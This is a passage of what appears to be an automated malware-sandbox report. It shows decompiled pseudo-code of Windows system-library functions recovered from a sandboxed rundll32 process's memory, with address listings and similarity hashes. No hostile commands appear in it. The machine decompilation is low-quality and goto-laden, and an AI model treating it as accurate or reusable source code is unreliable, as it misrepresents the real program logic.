										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E046113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L045F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04619650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                            0x045dc608
                                                                                            0x045dc615
                                                                                            0x045dc625
                                                                                            0x045dc62d
                                                                                            0x045dc635
                                                                                            0x045dc640
                                                                                            0x045dc680
                                                                                            0x045dc687
                                                                                            0x045dc688
                                                                                            0x045dc689
                                                                                            0x045dc694
                                                                                            0x045dc694
                                                                                            0x045dc642
                                                                                            0x045dc64a
                                                                                            0x045dc697
                                                                                            0x04647a25
                                                                                            0x04647a2b
                                                                                            0x04647a2e
                                                                                            0x04647a30
                                                                                            0x04647bea
                                                                                            0x04647bea
                                                                                            0x00000000
                                                                                            0x04647bea
                                                                                            0x04647a36
                                                                                            0x04647a43
                                                                                            0x04647a48
                                                                                            0x04647a4c
                                                                                            0x04647a4e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647a58
                                                                                            0x04647a5a
                                                                                            0x04647a5b
                                                                                            0x04647a5c
                                                                                            0x04647a5d
                                                                                            0x04647a63
                                                                                            0x04647a64
                                                                                            0x04647a6a
                                                                                            0x04647a6c
                                                                                            0x04647a6e
                                                                                            0x046479cb
                                                                                            0x046479cb
                                                                                            0x046479ce
                                                                                            0x046479d0
                                                                                            0x04647a98
                                                                                            0x04647a9b
                                                                                            0x04647a9b
                                                                                            0x04647a9e
                                                                                            0x04647aa1
                                                                                            0x04647bbe
                                                                                            0x04647bbe
                                                                                            0x04647bc0
                                                                                            0x04647be0
                                                                                            0x04647be0
                                                                                            0x04647a01
                                                                                            0x04647a01
                                                                                            0x04647a05
                                                                                            0x04647a07
                                                                                            0x04647a15
                                                                                            0x04647a15
                                                                                            0x04647a1a
                                                                                            0x00000000
                                                                                            0x04647a1a
                                                                                            0x04647bc2
                                                                                            0x04647bc6
                                                                                            0x04647bc9
                                                                                            0x04647bcd
                                                                                            0x04647bcf
                                                                                            0x046479e6
                                                                                            0x046479e6
                                                                                            0x046479eb
                                                                                            0x046479eb
                                                                                            0x046479ef
                                                                                            0x046479f1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046479f3
                                                                                            0x046479f5
                                                                                            0x046479ff
                                                                                            0x046479ff
                                                                                            0x00000000
                                                                                            0x046479ff
                                                                                            0x046479f7
                                                                                            0x046479fd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046479fd
                                                                                            0x04647bd5
                                                                                            0x04647bd8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ba9
                                                                                            0x04647bac
                                                                                            0x04647bb0
                                                                                            0x04647bb1
                                                                                            0x04647bb1
                                                                                            0x04647bb6
                                                                                            0x00000000
                                                                                            0x04647bb6
                                                                                            0x04647aa7
                                                                                            0x04647aaa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ab2
                                                                                            0x04647ab3
                                                                                            0x04647ab5
                                                                                            0x04647aec
                                                                                            0x04647aef
                                                                                            0x04647b25
                                                                                            0x04647b28
                                                                                            0x04647b62
                                                                                            0x04647b64
                                                                                            0x04647b8f
                                                                                            0x04647b92
                                                                                            0x04647b96
                                                                                            0x04647b98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b9e
                                                                                            0x04647b9f
                                                                                            0x04647ba3
                                                                                            0x00000000
                                                                                            0x04647ba3
                                                                                            0x04647b66
                                                                                            0x04647b68
                                                                                            0x04647ae2
                                                                                            0x04647ae2
                                                                                            0x00000000
                                                                                            0x04647ae2
                                                                                            0x04647b6e
                                                                                            0x04647b72
                                                                                            0x04647b75
                                                                                            0x04647b81
                                                                                            0x04647b85
                                                                                            0x04647b87
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b31
                                                                                            0x04647b34
                                                                                            0x04647b3c
                                                                                            0x04647b45
                                                                                            0x04647b46
                                                                                            0x04647b4f
                                                                                            0x04647b51
                                                                                            0x04647b57
                                                                                            0x04647b59
                                                                                            0x04647b59
                                                                                            0x00000000
                                                                                            0x04647b59
                                                                                            0x04647b77
                                                                                            0x00000000
                                                                                            0x04647b77
                                                                                            0x04647b2a
                                                                                            0x00000000
                                                                                            0x04647b2a
                                                                                            0x04647af1
                                                                                            0x04647af3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647afb
                                                                                            0x04647afc
                                                                                            0x04647afe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b00
                                                                                            0x04647b03
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b05
                                                                                            0x04647b09
                                                                                            0x04647b0d
                                                                                            0x04647b0f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b18
                                                                                            0x04647b1d
                                                                                            0x00000000
                                                                                            0x04647b1d
                                                                                            0x04647ab7
                                                                                            0x04647ab9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647abf
                                                                                            0x04647ac1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ac3
                                                                                            0x04647ac6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ac8
                                                                                            0x04647acc
                                                                                            0x04647ad0
                                                                                            0x04647ad2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647adb
                                                                                            0x00000000
                                                                                            0x04647adb
                                                                                            0x046479d6
                                                                                            0x046479d9
                                                                                            0x046479dc
                                                                                            0x04647a91
                                                                                            0x04647a94
                                                                                            0x00000000
                                                                                            0x04647a94
                                                                                            0x046479e2
                                                                                            0x00000000
                                                                                            0x046479e2
                                                                                            0x04647a74
                                                                                            0x04647a7a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647a8a
                                                                                            0x04647a21
                                                                                            0x04647a21
                                                                                            0x00000000
                                                                                            0x04647a21
                                                                                            0x045dc650
                                                                                            0x045dc651
                                                                                            0x045dc656
                                                                                            0x045dc65c
                                                                                            0x045dc65d
                                                                                            0x045dc663
                                                                                            0x045dc664
                                                                                            0x045dc66a
                                                                                            0x045dc66e
                                                                                            0x046479c5
                                                                                            0x046479c7
                                                                                            0x00000000
                                                                                            0x046479c7
                                                                                            0x045dc67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 293f33555e0c98222ac00fd435fdc0ab61336a1f8a1590df6e7ba23241fb67a7
                                                                                            • Instruction ID: 93b05446e7908172b9d013bee22d9e17e952f978b4ef423a4d0023936d81920e
                                                                                            • Opcode Fuzzy Hash: 293f33555e0c98222ac00fd435fdc0ab61336a1f8a1590df6e7ba23241fb67a7
                                                                                            • Instruction Fuzzy Hash: 65819C756442468BDF25CE58C880A6AB3A4FFD4355F18486AED459B380F330FD85CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0466B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 39%
                                                                                            			E0466B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x46c7b9c; // 0x0
				_t124 = L045F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04619800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E046195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E046195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L045F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04619910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E046195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x46c7b9c; // 0x0
									_t92 = L045F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04619910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E045DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0466E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0466E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E046195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                            0x0466b8d9
                                                                                            0x0466b8e4
                                                                                            0x00000000
                                                                                            0x0466b8e6
                                                                                            0x0466b8f3
                                                                                            0x0466b8f5
                                                                                            0x0466b8f5
                                                                                            0x0466b8f8
                                                                                            0x0466b920
                                                                                            0x0466b924
                                                                                            0x0466b936
                                                                                            0x0466b939
                                                                                            0x0466b93d
                                                                                            0x0466b948
                                                                                            0x0466b9a0
                                                                                            0x0466b9a0
                                                                                            0x0466b9a4
                                                                                            0x0466b9bf
                                                                                            0x0466b9c4
                                                                                            0x0466b9c6
                                                                                            0x0466b9cd
                                                                                            0x0466b9d1
                                                                                            0x0466bad4
                                                                                            0x0466bad8
                                                                                            0x0466bada
                                                                                            0x0466badc
                                                                                            0x0466badc
                                                                                            0x0466badf
                                                                                            0x0466bae0
                                                                                            0x0466bae2
                                                                                            0x0466bae4
                                                                                            0x0466baec
                                                                                            0x0466baee
                                                                                            0x0466baf0
                                                                                            0x0466baf0
                                                                                            0x0466baec
                                                                                            0x0466bafb
                                                                                            0x0466bafc
                                                                                            0x0466bafe
                                                                                            0x0466bb01
                                                                                            0x0466bb01
                                                                                            0x00000000
                                                                                            0x0466bb06
                                                                                            0x0466b9d7
                                                                                            0x0466b9db
                                                                                            0x0466b9db
                                                                                            0x0466b9de
                                                                                            0x0466b9de
                                                                                            0x0466b9e4
                                                                                            0x0466b9e7
                                                                                            0x0466b9ea
                                                                                            0x0466b9ec
                                                                                            0x0466b9ef
                                                                                            0x0466b9f3
                                                                                            0x0466ba1b
                                                                                            0x0466ba1b
                                                                                            0x0466ba23
                                                                                            0x0466ba24
                                                                                            0x0466ba27
                                                                                            0x0466ba2a
                                                                                            0x0466ba2b
                                                                                            0x0466ba2e
                                                                                            0x0466ba30
                                                                                            0x0466ba37
                                                                                            0x0466ba3f
                                                                                            0x0466ba9c
                                                                                            0x0466baa2
                                                                                            0x0466bb13
                                                                                            0x0466bb15
                                                                                            0x0466baae
                                                                                            0x0466baae
                                                                                            0x0466bab3
                                                                                            0x0466bab5
                                                                                            0x0466baba
                                                                                            0x0466bac8
                                                                                            0x0466bac8
                                                                                            0x0466baba
                                                                                            0x0466bacd
                                                                                            0x0466bacf
                                                                                            0x00000000
                                                                                            0x0466bacf
                                                                                            0x0466bb1a
                                                                                            0x00000000
                                                                                            0x0466bb1c
                                                                                            0x0466baa7
                                                                                            0x0466bb11
                                                                                            0x00000000
                                                                                            0x0466bb11
                                                                                            0x0466baa9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0466ba41
                                                                                            0x0466ba41
                                                                                            0x0466ba41
                                                                                            0x0466ba58
                                                                                            0x0466ba5d
                                                                                            0x0466ba62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0466ba64
                                                                                            0x0466ba67
                                                                                            0x0466ba68
                                                                                            0x0466ba69
                                                                                            0x0466ba6c
                                                                                            0x0466ba6f
                                                                                            0x0466ba71
                                                                                            0x0466ba78
                                                                                            0x0466ba80
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0466ba90
                                                                                            0x0466ba90
                                                                                            0x0466ba97
                                                                                            0x00000000
                                                                                            0x0466ba97
                                                                                            0x0466b9f5
                                                                                            0x0466b9f7
                                                                                            0x0466b9f7
                                                                                            0x0466b9fa
                                                                                            0x0466ba03
                                                                                            0x0466ba07
                                                                                            0x0466ba0c
                                                                                            0x0466ba10
                                                                                            0x0466ba17
                                                                                            0x00000000
                                                                                            0x0466b9f7
                                                                                            0x0466b9a6
                                                                                            0x0466b9a8
                                                                                            0x0466b9af
                                                                                            0x0466b9b3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0466b9b9
                                                                                            0x00000000
                                                                                            0x0466b9b9
                                                                                            0x0466b94d
                                                                                            0x0466b98f
                                                                                            0x0466b995
                                                                                            0x0466b999
                                                                                            0x0466b960
                                                                                            0x0466b967
                                                                                            0x0466b968
                                                                                            0x0466b96a
                                                                                            0x00000000
                                                                                            0x0466b96a
                                                                                            0x0466b99b
                                                                                            0x0466b99e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0466b99e
                                                                                            0x0466b951
                                                                                            0x0466b954
                                                                                            0x0466b95a
                                                                                            0x0466b95e
                                                                                            0x0466b972
                                                                                            0x0466b979
                                                                                            0x0466b97d
                                                                                            0x0466b97f
                                                                                            0x0466b980
                                                                                            0x0466b982
                                                                                            0x0466b984
                                                                                            0x00000000
                                                                                            0x0466b984
                                                                                            0x00000000
                                                                                            0x0466b926
                                                                                            0x00000000
                                                                                            0x0466b926

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 462a0e496e8b9cfdd98c6c4af7e718ff3d7ea3a581c52c45abf715eae0a38641
                                                                                            • Instruction ID: 318163f68c22d4b9eb9c477c95ff3d7b8f39af0efa803ba5e9c4f2debea9b3b2
                                                                                            • Opcode Fuzzy Hash: 462a0e496e8b9cfdd98c6c4af7e718ff3d7ea3a581c52c45abf715eae0a38641
                                                                                            • Instruction Fuzzy Hash: BA710F32200B11EFE7319F14C844F66BBB9EB84B24F184928E656CB2A0FB75F945DB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04656DC9 Relevance: .2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E04656DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04656B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E045F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04619AE0();
					_t87 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0465795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0465795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0465795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0465795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L045F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04656B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04656B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04656B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04656B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E045F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04619AE0();
								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L045F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L045F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L045F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L045F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                            0x04656dd4
                                                                                            0x04656dde
                                                                                            0x04656de1
                                                                                            0x04656de3
                                                                                            0x04656de6
                                                                                            0x04656de9
                                                                                            0x04656dec
                                                                                            0x04656def
                                                                                            0x04656df2
                                                                                            0x04656df5
                                                                                            0x04656dfe
                                                                                            0x04656e04
                                                                                            0x04656e09
                                                                                            0x04656e0d
                                                                                            0x04656e18
                                                                                            0x04656e1b
                                                                                            0x04656e22
                                                                                            0x04656e2d
                                                                                            0x04656e30
                                                                                            0x04656e36
                                                                                            0x04656e42
                                                                                            0x04656e4d
                                                                                            0x04656e50
                                                                                            0x04656e55
                                                                                            0x04656e5c
                                                                                            0x04656e6e
                                                                                            0x04656e5e
                                                                                            0x04656e67
                                                                                            0x04656e67
                                                                                            0x04656e73
                                                                                            0x04656e74
                                                                                            0x04656e77
                                                                                            0x04656e7c
                                                                                            0x04656e7d
                                                                                            0x04656e8e
                                                                                            0x04656e93
                                                                                            0x04656e9c
                                                                                            0x04656ea8
                                                                                            0x04656eab
                                                                                            0x04656eac
                                                                                            0x04656eb3
                                                                                            0x04656ecd
                                                                                            0x04656edc
                                                                                            0x04656ee2
                                                                                            0x04656ee5
                                                                                            0x04656ef2
                                                                                            0x04656efb
                                                                                            0x04656f01
                                                                                            0x04656f06
                                                                                            0x04656f0b
                                                                                            0x04656f11
                                                                                            0x04656f1a
                                                                                            0x04656f22
                                                                                            0x04656f26
                                                                                            0x04656f26
                                                                                            0x04656f33
                                                                                            0x04656f41
                                                                                            0x04656f44
                                                                                            0x04656f47
                                                                                            0x04656f54
                                                                                            0x04656f65
                                                                                            0x04656f77
                                                                                            0x04656f7c
                                                                                            0x04656f82
                                                                                            0x04656f91
                                                                                            0x04656f99
                                                                                            0x04656fa3
                                                                                            0x04656fae
                                                                                            0x04656fae
                                                                                            0x04656fba
                                                                                            0x04656fbb
                                                                                            0x04656fbc
                                                                                            0x04656fc1
                                                                                            0x04656fc2
                                                                                            0x04656fd3
                                                                                            0x04656fd8
                                                                                            0x04656fd8
                                                                                            0x04656fdf
                                                                                            0x04656fe8
                                                                                            0x04656fee
                                                                                            0x04656fee
                                                                                            0x04656ff5
                                                                                            0x04656ffb
                                                                                            0x04656ffb
                                                                                            0x04657004
                                                                                            0x00000000
                                                                                            0x0465700a
                                                                                            0x04657004
                                                                                            0x04656eb3
                                                                                            0x04656e9c
                                                                                            0x04657015

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction ID: ac66b928db8901434027c87cfcb334998cb6771b46ef747a0fd23834232a227f
                                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction Fuzzy Hash: E9717071E00619EFDB10DFA5C944AEEBBB9FF88714F104069E905E7250E730BA41CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D52A5 Relevance: .2, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E045D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E045EEEF0(0x46c79a0);
					_t104 =  *0x46c8210; // 0x29e2bd8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E045EEB70(_t93, 0x46c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
